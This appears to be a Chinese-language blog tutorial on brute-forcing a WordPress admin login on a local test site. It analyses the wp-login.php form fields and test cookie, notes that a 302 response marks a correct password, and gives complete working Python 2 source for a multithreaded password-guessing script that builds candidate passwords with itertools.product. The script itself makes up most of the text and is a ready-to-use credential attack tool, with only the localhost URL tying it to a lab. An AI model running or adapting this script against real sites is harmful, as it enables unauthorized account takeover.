基於python的多線程暴破腳本

搭建了一個本地wordpress，寫一個基於多線程異步I/O的暴力破解

1 測試

提交錯誤的表單數據時，查看請求參數

登錄時發送的cookie

2 登錄分析

經過多次測試，發現無論是輸入正確的密碼還是錯誤的密碼，這些登錄需要提交的參數是不會改變的。並且只要登錄成功，服務器一定會返回包含sessionid的cookie。整理后的發送參數如下：

參數

log:用戶名
pwd:密碼
wp-submit:Log In（定值）
redirect_to:http://localhost/wordpress/wp-admin
test_cookie:1（定值）

Cookie

wordpress_test_cookie:WP Cookie check（定值）

3 思路分析

口令集：
暴力破解一般是使用口令字符的全部排列組合，所使用的口令集可使用itertool模塊的笛卡爾積生成方法（product）來生成。當然這樣計算開銷比較大，適合口令長度比較小的情況。當然也可以使用字典，那么就可能需要結合用戶信息定制字典。

數據結構：
使用隊列來存儲口令集是個很不錯的選擇，能夠極大得降低數據讀取的復雜性。

模擬登陸：
通過requests模塊發送post請求，來模擬登陸，發送的參數與cookie依照上面的分析來發送即可。

登陸：
登陸失敗，只是本地刷新，所以響應碼200。登陸成功后，跳轉到管理員后台，返回響應碼302。

優化破解性能：
可使用異步I/O來進行破解過程的優化，待實現。

4 源碼

# !/usr/bin/env python
# -*- coding:utf-8 -*-
import requests
import sys
import itertools
import Queue
import threading
import time


class Bruter(object):
    def __init__(self, user, characters, pwd_len, threads):
        self.user = user
        self.found = False # 存放破解結果，破解成功為True，失敗為False
        self.threads = threads
        print '構建待測試口令隊列中...'
        self.pwd_queue = Queue.Queue()
        for pwd in list(itertools.product(characters, repeat=pwd_len)):
            self.pwd_queue.put(''.join(pwd))
        self.result = None
        print '構建成功!'

    def brute(self):
        for i in range(self.threads):
            t = threading.Thread(target=self.__web_bruter)
            t.start()
            print '破解線程-->%s 啟動' % t.ident
        while (not self.pwd_queue.empty()): # 剩余口令集判斷
            sys.stdout.write('\r 進度: 還剩余%s個口令 (每1s刷新)' % self.pwd_queue.qsize())
            sys.stdout.flush()
            time.sleep(1)
            print '\n破解完畢'

    def __login(self, pwd):
        url = 'http://localhost/wordpress/wp-login.php'
        values = {'log': self.user, 'pwd': pwd, 'wp-submit': 'Log In',
                  'redirect_to': 'http://localhost/wordpress/wp-admin', 'test_cookie': '1'}
        my_cookie = {'wordpress_test_cookie': 'WP Cookie check'}
        r = requests.post(url, data=values, cookies=my_cookie, allow_redirects=False) # 禁用重定向，以便后邊判斷登陸狀態
        if r.status_code == 302: # 登陸狀態判斷
            return True
        return False

    def __web_bruter(self): # 破解子線程函數
        while not self.pwd_queue.empty() and not self.found:
            pwd_test = self.pwd_queue.get()
            if self.__login(pwd_test):
                self.found = True
                self.result = pwd_test
                print '破解 %s 成功，密碼為: %s' % (self.user, pwd_test)
            else:
                self.found = False


if __name__ == '__main__':
    if len(sys.argv) != 5:
        print '用法 : cmd [用戶名] [密碼字符] [密碼長度] [線程數]'
        exit(0)
    b = Bruter(sys.argv[1], sys.argv[2], int(sys.argv[3]), int(sys.argv[4]))
    b.brute()
    print b.result